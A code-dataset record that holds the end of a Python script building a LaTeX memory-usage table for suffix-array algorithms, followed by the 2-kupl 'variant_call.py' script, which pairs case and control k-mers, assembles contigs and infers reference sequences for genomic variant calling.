threads = [1, 8, 16, 32, 64]
salgos = ['divsufsort']
palgos = ['parallelKS', 'parallelRange', 'parallelDivsufsort', 'pScan']
result_file = open('memorySuffix.tex', 'w')
def getMemory(a, b, c):
size = 1.0
for row in data:
if row[0] == a and row[1] == b and row[2] == c:
size = row[3]
return size * 1024 * 1024 / sizes[b];
def write_label(l):
result_file.write('\\multicolumn{2}{l}{\\textit{' + label + '}} \\\\\n')
def getStrMemory(f, algo, smallest):
if (algo in salgos):
return '%.2f '% getMemory(algo, f, 1)
else:
t64 = getMemory(algo, f, 64)
if (smallest):
return '\\textbf{%.2f} &' % t64
return '%.2f & ' % t64
def getSmallest(f):
mini = 100000000.0;
result = ''
for algo in palgos:
cur = getMemory(algo, f, 64)
if mini > cur:
mini = cur
result = algo
return result
def write_result(f):
result_file.write(f.replace('_', '\\_') + ' & ')
smallest = getSmallest(f)
for algo in palgos:
result_file.write(getStrMemory(f, algo, smallest == algo))
for algo in salgos:
result_file.write(getStrMemory(f, algo, smallest == algo))
result_file.write('\\\\\n')
result_file.write('\\begin{tabular}{l | r r r r | r}\n')
result_file.write('Input')
for a in ['KS', 'Range', 'parDss', 'Scan']:
result_file.write(' & {%s}' % a)
result_file.write(' & serDss \\\\\n')
result_file.write('\hline\n')
for (label, files) in inputs:
write_label(label)
for f in files:
write_result(f)
result_file.write('\\bottomrule\n')
result_file.write('\\end{tabular}\n')
| [
"julianlabeit@gmail.com"
] | julianlabeit@gmail.com |
b0eeedff566b8429408cf2f365015b174ba8e781 | 685f1edc5763cdfa63310f43a5ce9c07c8c406fc | /script/variant_call.py | 4062a05513627c74fb677da51e8294b620728cda | [
"MIT"
] | permissive | yunfengwang0317/2-kupl | 3b02f7fb1095cfc0a9cb84d76d663a62c80a2e44 | 0b525a147edaacd2a3aebc8b18f59e0f1882ffaf | refs/heads/master | 2023-05-30T19:47:58.174724 | 2021-06-23T11:35:57 | 2021-06-23T11:35:57 | 300,064,708 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 29,987 | py | import os,sys,time,subprocess,re,gzip,platform
from math import ceil
from tqdm import *
import pandas as pd
import numpy as np
from tempfile import *
import scipy.stats as stats
from Bio import pairwise2
from Bio.pairwise2 import format_alignment
from difflib import SequenceMatcher
from pydna.assembly import Assembly
from pydna.dseqrecord import Dseqrecord
from Bio.Seq import Seq
from collections import defaultdict
from functools import partial
from multiprocessing import Process,Pool,Manager,Value
#from fsplit.filesplit import FileSplit
# Choose the shell command used to stream gzip'd files on this OS:
# GNU/Linux ships a plain 'zcat'; on macOS (Darwin) 'zcat' expects a .Z
# suffix, so 'gunzip -c' is used instead. Any other platform is unsupported.
if platform.system()=='Linux':compress='zcat'
elif platform.system()=='Darwin':compress='gunzip -c'
else:
    print ('2kupl runs on either Linux or Macos')
    os._exit(0)  # hard-exit at import time: unsupported platform
def dist(s1, s2, start=0):
    """Hamming distance between s1[start:] and s2[start:], capped at one.

    Returns 0 or 1 when the two suffixes are identical or differ at a single
    position.  As soon as a second mismatch is found, returns the sentinel
    value 9 so callers can cheaply reject k-mer pairs differing at more than
    one position without scanning the remainder.

    Raises ValueError if the sequences have unequal length.
    """
    if len(s1) != len(s2):
        raise ValueError('undefined for sequences of unequal length')
    hd = 0
    for c1, c2 in zip(s1[start:], s2[start:]):
        if c1 != c2:
            hd += 1
            if hd > 1:
                return 9  # early exit: more than one mismatch
    return hd
def sizeof_fmt(num, suffix='B'):
    """Render a byte count as a human-readable string with binary prefixes.

    Divides by 1024 until the magnitude drops below 1024, attaching the
    matching IEC prefix (KiB, MiB, ...); anything past Zi falls through to Yi.
    """
    for prefix in ('', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi'):
        if abs(num) < 1024.0:
            return f"{num:3.1f} {prefix}{suffix}"
        num /= 1024.0
    return f"{num:.1f} Yi{suffix}"
def createindex(lock,fi):
    """Worker: index one chunk of the control k-mer count table and pair it
    against the case-specific k-mers (module global `spekmer`).

    fi is a space-separated `kmer count` file chunk. Matching pairs are
    appended under `lock` to the shared manager lists pair_T / pair_N.
    """
    global pair_T,pair_N
    # Two hash indexes keyed by the first / last 15 bases of each 31-mer;
    # each bucket separates 'ref' (control) from 'mut' (case-specific) k-mers.
    idx_head,idx_tail=defaultdict(lambda: defaultdict(list)),defaultdict(lambda: defaultdict(list))
    dat=pd.read_csv(fi,header=None,index_col=None,sep=' ')#the 1st line in kmercount table is considered to be the head by kmerFilter
    subwildkmers = dict(zip(dat.iloc[:,0],dat.iloc[:,1]))
    for p in subwildkmers.keys():
        idx_head[p[:15]]['ref'].append(p)
        idx_tail[p[-15:]]['ref'].append(p)
    for q in spekmer:
        idx_head[q[:15]]['mut'].append(q)
        idx_tail[q[-15:]]['mut'].append(q)
    subpair_T,subpair_N=pairkmers(idx_head,idx_tail)
    # Serialize appends to the shared proxy lists across worker processes.
    lock.acquire()
    pair_N+=subpair_N
    pair_T+=subpair_T
    lock.release()
    idx_head.clear()
    idx_tail.clear()
def pairkmers(idx_head,idx_tail):
    """Pair each case-specific ('mut') k-mer with control ('ref') k-mers that
    share a 15-base anchor and differ by exactly one base in the remainder.

    Returns (subpair_T, subpair_N): parallel lists of mutant / reference
    k-mers, possibly containing one entry per anchor side for a given k-mer.
    """
    subpair_T,subpair_N=[],[]
    # Head-anchored candidates: first 15 bases identical, so only compare
    # positions 15..30 (dist start=15).
    for key in tqdm(idx_head.keys()):
        if idx_head[key]['ref']==[] or idx_head[key]['mut']==[]:continue
        for q in idx_head[key]['mut']:
            for j in idx_head[key]['ref']:
                if q==j:break#second check if kmer is common in both T&N; skip remaining refs for this q
                if dist(q,j,15)==1:
                    subpair_T.append(q)
                    subpair_N.append(j)
    # Tail-anchored candidates: last 15 bases identical; compare from the
    # start of the k-mer (dist start=0; early-exit keeps it cheap).
    for key in tqdm(idx_tail.keys()):
        if idx_tail[key]['ref']==[] or idx_tail[key]['mut']==[]:continue
        for q in idx_tail[key]['mut']:
            for j in idx_tail[key]['ref']:
                if q==j:break
                if dist(q,j,0)==1:
                    subpair_T.append(q)
                    subpair_N.append(j)
    return (subpair_T,subpair_N)
def contig2kmer(contig, rev=False):
    """Decompose a contig into its overlapping 31-mers.

    When rev is True the reverse complement of the contig is decomposed
    instead. Contigs shorter than 31 bases yield an empty list.
    """
    seq = str(Seq(contig).reverse_complement()) if rev else contig
    return [seq[pos:pos + 31] for pos in range(len(seq) - 30)]
def maxoverlap(s1, s2):
    """Locate the longest common substring of s1 and s2.

    Returns (start_in_s1, start_in_s2, length); (0, 0, 0) when the two
    strings share nothing.
    """
    matcher = SequenceMatcher(None, s1, s2)
    match = matcher.find_longest_match(0, len(s1), 0, len(s2))
    return (match.a, match.b, match.size)
def assemDNA(lst):
    """Greedy overlap assembly of the sequences in `lst` into one string.

    Starts from the first sequence padded with 100 'N' placeholders, then
    splices each subsequent k-mer over the region it overlaps by >= 10 bases.
    NOTE(review): str.replace substitutes *every* occurrence of the matched
    slice, and the 31-base slice width assumes 31-mer inputs — confirm both
    are intended for low-complexity sequences.
    """
    res = lst[0]+'N'*100
    for tarkmer in lst[1:]:
        pos_s,pos_t,size = maxoverlap(res, tarkmer)
        if size<10:continue
        res=res.replace(res[pos_s:pos_s+31-pos_t],tarkmer)
    # Strip any leftover 'N' padding from both ends.
    return (res.strip('N'))
def CAP(contig,reads):
    """Infer a putative reference sequence for `contig` by assembling the
    given reads with the external cap3 assembler.

    Returns:
        'NA' if any read already contains the whole contig,
        ''   if cap3 produced no assembled contigs,
        otherwise the best-quality assembled sequence, reverse-complemented
        when it overlaps the contig's reverse complement better.
    """
    randseed=np.random.randint(1000,1000000)
    fa=NamedTemporaryFile(delete=False)
    out=open(fa.name,'w')
    # Write the reads as a FASTA file for cap3; abort early if a read fully
    # covers the contig (nothing to infer).
    for i in reads:
        if contig in i:return ('NA')
        else:
            out.write('>%s\n'%i)
            out.write(i+'\n')
    out.close()
    subprocess.call("cap3 %s -x %s > /dev/null"%(fa.name,randseed),shell=True)
    # Count how many contigs cap3 assembled (headers start with "Contig").
    if os.path.exists('%s.%s.contigs'%(fa.name,randseed)):infered_contigs_nb=int(os.popen("grep Contig %s.%s.contigs|wc -l"%(fa.name,randseed)).readline().strip())
    else:
        print (contig,reads,' failed to infer ref')
        infered_contigs_nb=0
    if infered_contigs_nb==0:return('')
    # Parse the assembled contigs (FASTA) keyed by header prefix.
    putative_ref = {}
    for line in open(r'%s.%s.contigs'%(fa.name,randseed)):
        if line.startswith('>'):
            key = line.split(' ')[0]
            putative_ref[key] = ''
        else:
            putative_ref[key]+=line.strip()
    # Parse the per-base quality values emitted alongside each contig.
    ref_qual = {}
    for line in open(r'%s.%s.contigs.qual'%(fa.name,randseed)):
        if line.startswith('>'):
            key = line.split(' ')[0]
            ref_qual[key] = []
        else:
            ref_qual[key]+=line.split()
    # Keep contigs whose mean quality exceeds 50, tracking the single best
    # scorer as a fallback.
    ref=[]
    bestref,bestscore='',0
    for k,v in ref_qual.items():
        score=np.mean(np.array(ref_qual[k]).astype(int))
        if score>bestscore:
            bestscore=score
            bestref=putative_ref[k]
        if score>50:ref.append(putative_ref[k])
    if len(ref)==0:#use the putative ref with largest score
        ref=[bestref]
    # Remove cap3 scratch files.
    os.system('rm %s.%s*'%(fa.name,randseed))
    if len(ref)==1:putative_ref=(ref[0])
    elif len(ref)>=2:
        putative_ref=bestref
    # Orient the result to match whichever strand of the contig it overlaps
    # more strongly.
    plus,minus=maxoverlap(contig,putative_ref)[2],maxoverlap(str(Seq(contig).reverse_complement()),putative_ref)[2]
    if plus>minus:return putative_ref
    else:return str(Seq(putative_ref).reverse_complement())
def nestDict(set1, set2):
    """Map contig head/tail anchor substrings to read fragments containing them.

    For every contig in set1, the first and last half (capped at 60 bases)
    become anchor keys. Every read in set2 that contains an anchor contributes
    a padded fragment around the first occurrence; at most ~50 fragments are
    collected per anchor.
    """
    idx = defaultdict(list)
    keys_h, keys_t = [], []
    for q in set1:
        keys_h.append(q[:min(int(len(q)/2), 60)])
        keys_t.append(q[max(-60, -int(len(q)/2)):])
    for p in set2:
        for k in keys_h:
            if len(idx[k]) > 50:  # cap the evidence collected per anchor
                continue
            if k in p:
                idx[k].append(p[max(0, p.index(k)-15):p.index(k)+len(k)*2+15])
                break
        for k in keys_t:
            if len(idx[k]) > 50:
                continue
            # Bug fix: the original looped `for k in p` (over each character
            # of the read), appending one fragment per character; mirror the
            # head-anchor logic with a substring membership test instead.
            if k in p:
                idx[k].append(p[max(p.index(k)-len(k), 0):p.index(k)+len(k)+15])
                break
    return idx
def contig_read_hash(fi,cor_reads):
    """Associate each contig listed in `fi` with reads from the bbduk output
    FASTA `cor_reads` that overlap it by at least 15 bases.

    bbduk's `rename=t` appends the matching reference names to each header,
    which is what the `([ATCG]+)=` regex extracts. Returns a dict mapping
    contig -> list of (up to ~10) trimmed read fragments, oriented to the
    strand that overlaps the contig best.
    """
    with open(fi)as f:
        contigs=list(map(lambda x:x.strip(),f))
    contig_reads=defaultdict(list)
    with open(cor_reads) as f:
        while True:
            line=f.readline()
            if not line:break
            if line.startswith('>')is False:continue
            # The sequence is on the line following each FASTA header.
            seq=f.readline().strip()
            querys=re.findall('([ATCG]+)=',line)
            if len(querys)==0:continue
            for query in querys:
                if len(contig_reads[query])>10:
                    continue
                query=query.split('=')[0]#useless
                if query not in contigs:continue
                # Compare overlap on both strands and keep the better one.
                seq_s1,query_s1,len_overlap1=maxoverlap(seq,query)
                seqrv=str(Seq(seq).reverse_complement())
                seq_s2,query_s2,len_overlap2=maxoverlap(seqrv,query)
                if len_overlap1>len_overlap2:seq,seq_s,query_s,len_overlap=seq,seq_s1,query_s1,len_overlap1
                else:seq,seq_s,query_s,len_overlap=seqrv,seq_s2,query_s2,len_overlap2
                if len_overlap<15:continue
                # Keep the read trimmed to the contig region plus 30 bases of
                # flanking context on each side.
                contig_reads[query].append(seq[max(0,seq_s-query_s-30):min(len(seq),seq_s+len(query)-query_s+30)])
    return (contig_reads)
def infer_ref(line):
    """Infer the reference sequence for a paired contig (row from a contig
    table; line[0] is the contig sequence).

    Looks up the contig's paired reference k-mers in the module-global
    `contig_sp_cov` table and assembles them (pydna Assembly first, greedy
    assemDNA as fallback). Returns
    (refseq, sp_case, cov_case, sp_control, cov_control).
    """
    contig=line[0]
    # NOTE(review): `kmers` is computed but never used here.
    kmers=contig2kmer(contig)
    sp_case,cov_case,sp_control,cov_control,refpairs=contig_sp_cov.loc[contig].tolist()
    refpairs=refpairs.split(',')
    # A single paired reference k-mer is the reference by itself.
    if len(refpairs)==1:return (refpairs[0],sp_case,cov_case,sp_control,cov_control)
    try:
        refseq=Assembly([Dseqrecord(i) for i in refpairs],limit=15).assemble_linear(max_nodes=3)[0].seq.watson
        if maxoverlap(contig,refseq)[2]<15:refseq=assemDNA(refpairs)#for sake of low complexity sequences
    except:refseq=assemDNA(refpairs)
    # Flip to the reverse complement when the assembly landed on the
    # opposite strand of the contig.
    if maxoverlap(contig,refseq)[2]<15:refseq=str(Seq(refseq).reverse_complement())
    return (refseq,sp_case,cov_case,sp_control,cov_control)
def infer_ref_unpair(line,unpair_reads_dict):
    """Infer the reference sequence for an unpaired contig, using reads
    retrieved by bbduk (unpair_reads_dict) and, when read depth allows,
    the external cap3 assembler.

    Returns (refseq, sp_case, cov_case, sp_control, cov_control); refseq is
    'NA' when nothing could be inferred.
    """
    contig,refseq=line[0],''
    # NOTE(review): `kmers` is computed but never used here.
    kmers=contig2kmer(contig)
    sp_case,cov_case,sp_control,cov_control,refpairs=contig_sp_cov.loc[contig].tolist()
    refpairs=refpairs.split(',')
    related_reads=unpair_reads_dict[contig]
    refseq='NA'
    if len(refpairs)>2:#indels should have no more than 2 paired refs.(head and tail)
        try:
            refseq=Assembly([Dseqrecord(i) for i in refpairs],limit=15).assemble_linear(max_nodes=3)[0].seq.watson
        except:refseq=assemDNA(refpairs)
    # With enough supporting reads, try cap3 assembly when the current
    # reference is shorter than the contig.
    if len(related_reads)>lowdepth/2 and len(refseq)<len(contig):refseq=CAP(contig,related_reads)
    if maxoverlap(contig,refseq)[2]<15:refseq=str(Seq(refseq).reverse_complement())
    return (refseq,sp_case,cov_case,sp_control,cov_control)
def ana_contigs(fi,paired=True):
    """Worker: infer references for one chunk file of contigs and write a
    per-chunk result CSV under contig_pair/ or contig_unpair/.

    fi is a split chunk; only the first chunk (x00*) carries a header row.
    """
    if fi.split('/')[-1].startswith('x00'):contigs=pd.read_csv(fi,header=0,index_col=None,sep='\t')
    else:contigs=pd.read_csv(fi,header=None,index_col=None,sep='\t')
    contigs.columns=['contig']
    # Unpaired contigs need the bbduk-retrieved reads to infer a reference.
    if paired==False:unpair_reads_dict=contig_read_hash(fi,cor_reads)
    a,b,c,d,e=[],[],[],[],[]
    for i in trange(contigs.shape[0]):
        if paired==False:aa,bb,cc,dd,ee=infer_ref_unpair(contigs.loc[i],unpair_reads_dict)
        else:aa,bb,cc,dd,ee=infer_ref(contigs.loc[i])
        a.append(aa)
        b.append(bb)
        c.append(cc)
        d.append(dd)
        e.append(ee)
    contigs['putative_ref'],contigs['sp_case'],contigs['cov_case'],contigs['sp_control'],contigs['cov_control']=a,b,c,d,e#zip(*contigs.apply(infer_ref_unpair,1,args=(unpair_reads_dict,)))
    if paired==False:contigs.to_csv('%s/contig_unpair/result%s.csv'%(outdir,fi.split('/')[-1]),header=False,index=False,sep='\t')
    else:contigs.to_csv('%s/contig_pair/result%s.csv'%(outdir,fi.split('/')[-1]),header=False,index=False,sep='\t')
def filter_unpaired_contigs(fi):
    """Filter one chunk of unpaired contigs, keeping only contigs whose two
    terminal 31-mers both have a paired reference k-mer in `kmerpair`.

    Writes three per-chunk files under contig_unpair/ (random suffix `seed`):
    a FASTA of passing contigs, a plain list of passing contigs, and a list
    of contigs for which no reference can be inferred.
    """
    #fileter low depth contig_unpaired
    seed=NamedTemporaryFile(delete=True).name.split('/')[-1]
    out=open('%s/contig_unpair/passedcontig_%s.fa'%(outdir,seed),'w')
    out2=open('%s/contig_unpair/contigs_unpaired_%s'%(outdir,seed),'w')
    weird_contig=open('%s/contig_unpair/FailedToInferRef_%s.txt'%(outdir,seed),'w')
    contig_unpair=pd.read_csv(fi,header=None,index_col=None,sep='\t')
    if contig_unpair.shape[1]==4:contig_unpair.columns=['nb_kmer','contig','tag','Pvalue']
    elif contig_unpair.shape[1]==1:contig_unpair.columns=['contig']
    for contig in tqdm(contig_unpair.contig.tolist()):
        headtailkmers=[contig[:31],contig[-31:]]
        refkmers=kmerpair.reindex(headtailkmers)[1].dropna().tolist()
        if len(refkmers)<2:
            # Fewer than two anchored reference k-mers: cannot infer a ref.
            weird_contig.write(contig+'\n')
            continue
        out.write('>%s\n%s\n'%(contig,contig))
        out2.write(contig+'\n')
    # Bug fix: out2 was closed inside the loop after the first passing
    # contig, so writing any later contig raised
    # "ValueError: I/O operation on closed file".
    out2.close()
    out.close()
    weird_contig.close()
def usedkmers(fi):
    """Query the jellyfish database derived from count table `fi` for every
    k-mer referenced by a pair, and store counts (plus reverse complements)
    as contig_pair/usedkmers_<sample>.

    NOTE(review): str.strip('.txt.gz') strips a *character set*, not the
    suffix, so `tag` can lose extra leading/trailing letters; the later
    read/write paths use .replace('.txt.gz','') instead — confirm the two
    naming schemes actually agree for the sample names used.
    """
    tag=fi.split('/')[-1].strip('.txt.gz')
    # Convert the plain k-mer list into FASTA, then query jellyfish for counts.
    subprocess.call(r"""less %s/contig_pair/usedkmers|awk '{print ">contig_"NR"\n"$1}' > %s/contig_pair/usedkmers_%s.fa"""%(outdir,outdir,tag),shell=True)
    subprocess.call(r"""jellyfish query -s %s/contig_pair/usedkmers_%s.fa %s -o %s/contig_pair/usedkmers_%s"""%(outdir,tag,fi.replace('.txt.gz','.jf'),outdir,tag),shell=True,executable='/bin/bash')
    kmers=pd.read_csv('%s/contig_pair/usedkmers_%s'%(outdir,fi.split('/')[-1].replace('.txt.gz','')),header=None,index_col=None,sep=' ')
    # Duplicate each entry under its reverse complement so later lookups are
    # strand-agnostic.
    kmers_rv=pd.DataFrame({0:[str(Seq(i).reverse_complement()) for i in kmers[0]],1:kmers[1]})
    kmers=pd.concat([kmers,kmers_rv]).drop_duplicates()
    kmers.index=kmers[0]
    del kmers[0]
    kmers.to_csv('%s/contig_pair/usedkmers_%s'%(outdir,fi.split('/')[-1].replace('.txt.gz','')),header=False,index=True,sep=' ')
def OnlyKeepMaxRef():
    """Deduplicate kmerpair.csv so every mutant k-mer keeps only the paired
    reference k-mer with the highest count in the control sample.

    Rewrites contig_pair/kmerpair.csv in place (indexed by mutant k-mer).
    """
    kmerpair=pd.read_csv('%s/contig_pair/kmerpair.csv'%outdir,header=None,index_col=None,sep='\t')
    kmerpair.columns=['mut','wild']
    wildkmercount=pd.read_csv('%s/contig_pair/usedkmers_%s'%(outdir,kmerfile_N.split('/')[-1].replace('.txt.gz','')),header=None,index_col=None,sep=' ')
    wildkmercount.columns=['wild','count']
    kmerpair_wildcount=pd.merge(kmerpair,wildkmercount,left_on='wild',right_on='wild',how='left')
    # Sorting by count descending makes groupby().first() pick the max-count
    # wild k-mer per mutant k-mer.
    kmerpair_wildcount=kmerpair_wildcount.sort_values('count',ascending=False).groupby('mut').first()
    kmerpair_wildcount.to_csv('%s/contig_pair/kmerpair.csv'%outdir,header=False,index=True,sep='\t')
def shrink():
    """Trim merged_contigs/contigs_allspkmers in place, keeping only contigs
    whose length is in [31 + nb_kmers, 100) — i.e. supported by enough
    specific k-mers but short enough to analyse.
    """
    contigs=pd.read_csv('%s/merged_contigs/contigs_allspkmers'%outdir,header=0,index_col=None,sep='\t')
    length=contigs.contig.apply(lambda x:len(x),1)
    contigs=contigs[(length>=31+nb_kmers) & (length<100)]
    contigs.to_csv('%s/merged_contigs/contigs_allspkmers'%outdir,header=True,index=False,sep='\t')
def comm(param):
    """Pool worker that extracts k-mer subsets with shell `comm` / awk.

    param selects the mode: '12' = k-mers shared by case and control (above
    `support`), '23' = case-specific k-mers (absent from control), 'homo' =
    control k-mers above `lowdepth` (homozygous-variant calling).
    Re-parses sys.argv locally because pool workers re-import the module and
    the `__main__` globals are not guaranteed to be inherited.
    """
    threads,kmerfile_T,kmerfile_N,wild1,wild2,lowdepth,cutoff,support,nb_kmers,distance=sys.argv[1:]
    threads,lowdepth,cutoff,support,nb_kmers,distance=int(threads),int(lowdepth),float(cutoff),int(support),int(nb_kmers),int(distance)
    samid=kmerfile_T.split('/')[-1].replace('.txt.gz','')
    outdir=os.path.dirname(os.path.dirname(kmerfile_T))
    if param=='12':
        subprocess.call(r'''comm -12 <(%s %s|awk '{if($2>%s){print $1}}') <(%s %s |awk '{if($2>%s){print $1}}') > %s/case_specific_kmers/shared_kmers'''%(compress,kmerfile_T,support,compress,kmerfile_N,support,outdir),shell=True,executable='/bin/bash')
    elif param=='23':
        subprocess.call(r'''comm -23 <(%s %s|awk '{if($2>%s){print $1}}') <(%s %s |awk '{if($2>0){print $1}}') > %s/case_specific_kmers/specific_kmer'''%(compress,kmerfile_T,support,compress,kmerfile_N,outdir),shell=True,executable='/bin/bash')
    elif param=='homo':
        subprocess.call(r'''%s %s|awk '{if($2>%s){print $1}}' > %s/case_specific_kmers/shared_kmers'''%(compress,kmerfile_N,lowdepth,outdir),shell=True,executable='/bin/bash')#adaptable to homo variant
def Cal_sp_cov(contigs):
    """Compute per-contig support and coverage from k-mer counts.

    For each contig, decompose into 31-mers, look up the paired reference
    k-mer (`kmerpair`), and take per-contig medians of the tumor/normal
    counts (`mutkmers` / `wildkmers` module globals). Coverage is the sum of
    the variant-allele and reference-allele counts. Contigs failing the
    `support` / `lowdepth` thresholds are dropped, and every surviving row is
    duplicated under the contig's reverse complement for strand-agnostic
    lookup. Returns a DataFrame indexed by contig with columns
    [sp_T, cov_T, sp_N, cov_N, refpairs].
    """
    col1,col2=[],[]
    for contig in contigs:
        kmers=contig2kmer(contig)
        col1+=[contig]*len(kmers)
        col2+=kmers
    df=pd.DataFrame({'contig':col1,'kmers':col2})
    df['refs']=kmerpair.reindex(df.kmers)[1].tolist()
    df['sp_T']=mutkmers.reindex(df.kmers)[1].tolist()
    df['allel2_T']=mutkmers.reindex(df.refs)[1].tolist()
    df['sp_N']=wildkmers.reindex(df.kmers)[1].tolist()
    df['allel2_N']=wildkmers.reindex(df.refs)[1].tolist()
    # Keep the full per-kmer table (rows with all counts present) to collect
    # the reference k-mers per contig below.
    rawdf=df.dropna().copy()
    df=df.groupby('contig').median()
    df['cov_T']=df.sp_T+df.allel2_T
    df['cov_N']=df.sp_N+df.allel2_N
    df=df[['sp_T','cov_T','sp_N','cov_N']].dropna().astype(int)
    df=df[(df.sp_T>=support)&(df.cov_T>=lowdepth)]
    df['refpairs']=rawdf.groupby('contig')['refs'].apply(lambda x:','.join(x))
    df_rv=df.copy()
    df_rv.index=[str(Seq(i).reverse_complement()) for i in df.index]
    df=pd.concat([df,df_rv])
    df=df.loc[~df.index.duplicated(keep='first')]
    return df
def RemoveFP_via_control(contigs):
    """Query the control jellyfish database for 1-base extensions of short
    contigs and write the counts to variant_result/ext_kmers_count.

    For each contig (<= 60 bp) the first/last 30 bases are extended by each
    of A/T/C/G; presence of those extensions in the control supports the
    contig being a false positive. NOTE(review): this function only writes
    the count file — no filtering happens here, and `ext_kmers_count`
    (the NamedTemporaryFile) is created but never used.
    """
    ext_kmers=defaultdict(list)
    for contig in contigs:
        if len(contig)>60:continue
        for c in 'ATCG':
            ext_kmers[contig].append(c+contig[:30])
            ext_kmers[contig].append(contig[-30:]+c)
    fa=NamedTemporaryFile(delete=False)
    ext_kmers_count=NamedTemporaryFile(delete=False)
    out=open(fa.name+'.fa','w')
    # Dump the extended k-mers as FASTA for jellyfish query.
    for i_ in ext_kmers.values():
        for i in i_:
            out.write('>%s\n'%i)
            out.write(i+'\n')
    out.close()
    subprocess.call(r"""jellyfish query -s %s.fa %s/case_specific_kmers/%s -o %s/variant_result/ext_kmers_count"""%(fa.name,outdir,kmerfile_N.split('/')[-1].replace('.txt.gz','.jf'),outdir),shell=True,executable='/bin/bash')
if __name__ == '__main__':
    # CLI: threads, tumor/normal k-mer tables, the two FASTQ files, and the
    # depth/ratio/support thresholds used throughout the pipeline.
    threads,kmerfile_T,kmerfile_N,wild1,wild2,lowdepth,cutoff,support,nb_kmers,distance=sys.argv[1:]
    threads,lowdepth,cutoff,support,nb_kmers,distance=int(threads),int(lowdepth),float(cutoff),int(support),int(nb_kmers),int(distance)
    samid=kmerfile_T.split('/')[-1].replace('.txt.gz','')
    outdir=os.path.dirname(os.path.dirname(kmerfile_T))
    # Build the bundled mergeTags binary and copy it next to this script.
    os.system('cd ../mergeTags;make')
    os.system('mv ../mergeTags/mergeTags ./')
    ################# extract case specific kmers #######################
    nb_kmers_eachthread=10000000
    fpath='%s/case_specific_kmers/shared_kmers_count'%outdir
    if os.path.exists('%s/variant_result/SNV_alignments.vcf'%outdir) is False:
        print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'extract specific kmers')
        pool=Pool(2)
        pool.map(comm,['23','homo'])# homo mode for calling homozygote and 12 mode for somatic
        pool.close()
        pool.join()
        # Bail out when there are too many specific k-mers to process.
        if int(os.popen('wc -l %s/case_specific_kmers/specific_kmer'%outdir).readline().strip().split()[0])>50000000:os._exit(0)
        os.system("echo 'tag\tpvalue' > %s/case_specific_kmers/specific_kmer_fix"%outdir)
        print("./mergeTags -k 31 -m 25 -n %s/case_specific_kmers/specific_kmer_fix 2>/dev/null|awk '{if($1>%s){print $0}}'|gzip -c > %s/merged_contigs/contigs.gz;gunzip -c %s/merged_contigs/contigs.gz > %s/merged_contigs/contigs_allspkmers"%(outdir,nb_kmers,outdir,outdir,outdir))
        subprocess.call(r"""awk '{print $1"\t0"}' %s/case_specific_kmers/specific_kmer >> %s/case_specific_kmers/specific_kmer_fix"""%(outdir,outdir),shell=True)
        subprocess.call(r"./mergeTags -k 31 -m 25 -n %s/case_specific_kmers/specific_kmer_fix 2>/dev/null|awk '{if($1>%s){print $0}}'|gzip -c > %s/merged_contigs/contigs.gz;gunzip -c %s/merged_contigs/contigs.gz > %s/merged_contigs/contigs_allspkmers"%(outdir,nb_kmers,outdir,outdir,outdir),shell=True)
        subprocess.call(r"""less %s/case_specific_kmers/shared_kmers|awk '{print ">kmer"NR"\n"$1}' > %s/case_specific_kmers/shared_kmers.fa"""%(outdir,outdir),shell=True)
        subprocess.call(r"""jellyfish query -s %s/case_specific_kmers/shared_kmers.fa %s/case_specific_kmers/%s -o %s/case_specific_kmers/shared_kmers_count"""%(outdir,outdir,kmerfile_N.split('/')[-1].replace('.txt.gz','.jf'),outdir),shell=True)
    #shrink the contigs_allspkmers and remove useless kmers from the specific_kmer_fix
    if os.path.exists('%s/contig_pair/contigs_pairedspkmers'%outdir) is False:
        shrink()
        # Split the shared k-mer count table into per-worker chunks; macOS
        # split lacks -d/--additional-suffix, hence the rename loop.
        if platform.system()=='Linux':
            os.system("""rm %s/x*_N;split -l %s -d --additional-suffix=%s_N %s/case_specific_kmers/shared_kmers_count;mv x*%s_N %s"""%(outdir,min(10000000,nb_kmers_eachthread),samid,outdir,samid,outdir))
        else:
            os.system("""rm %s/x*_N;split -l %s %s/case_specific_kmers/shared_kmers_count"""%(outdir,min(10000000,nb_kmers_eachthread),outdir))
            for xf in os.popen('ls ./x*').readlines():
                os.system("mv %s %s"%(xf.strip(),outdir+'/'+xf.strip()+samid+'_N'))
        fileidxs=[i.strip() for i in os.popen('ls %s/x*%s_N'%(outdir,samid)).readlines()]
        print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'indexing and pairing kmers')
        with open('%s/case_specific_kmers/specific_kmer_fix'%outdir)as f:
            spekmer=list(map(lambda x:x.strip().split()[0],f))[1:]#the 1st line is tag\tpvalue
        spekmer=spekmer+[str(Seq(i).reverse_complement()) for i in spekmer]#add revcomp to the specific kmer list, in case kmerpair misses true pairs.remove and test
        with Manager() as manager:
            ################# pairing kmers from case and control #####################
            lock=manager.Lock()
            global pair_T,pair_N
            pair_T=manager.list()
            pair_N=manager.list()
            ncores=min(threads,len(fileidxs))
            pool=Pool(ncores)
            singlethread = partial(createindex, lock)
            pool.map(singlethread, fileidxs)
            pool.close()
            pool.join()
            '''
            print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'adding mut kmers into the hash')#what's the purpose of this part?
            idx_head,idx_tail=defaultdict(lambda: defaultdict(list)),defaultdict(lambda: defaultdict(list))
            for q in spekmer:
                idx_head[q[:15]]['mut'].append(q)
                idx_tail[q[-15:]]['mut'].append(q)
            subpair_T,subpair_N=pairkmers(idx_head,idx_tail)
            pair_T+=subpair_T
            pair_N+=subpair_N
            print (len(subpair_T))
            '''
            # Persist the mutant/reference pairs, add reverse complements,
            # and keep one reference per mutant k-mer (max control count).
            np.savetxt('%s/contig_pair/pair.txt'%outdir, np.stack([pair_T,pair_N]).T,delimiter="\t",fmt="%s")
            out=open('%s/contig_pair/kmer_T'%outdir,'w')
            kmerpair=pd.read_csv('%s/contig_pair/pair.txt'%outdir,header=None,index_col=None,sep='\t')
            pair_T_rv=[str(Seq(i).reverse_complement()) for i in pair_T]
            for p in set(pair_T).difference(set(pair_T_rv)):out.write(p+'\n')
            out.close()
            kmerpair_rv=pd.DataFrame({0:[str(Seq(i).reverse_complement()) for i in kmerpair[0]],1:[str(Seq(i).reverse_complement()) for i in kmerpair[1]]})
            kmerpair=pd.concat([kmerpair,kmerpair_rv]).drop_duplicates()
            kmerpair.index=kmerpair[0]
            del kmerpair[0]
            kmerpair.to_csv('%s/contig_pair/kmerpair.csv'%outdir,header=False,index=True,sep='\t')
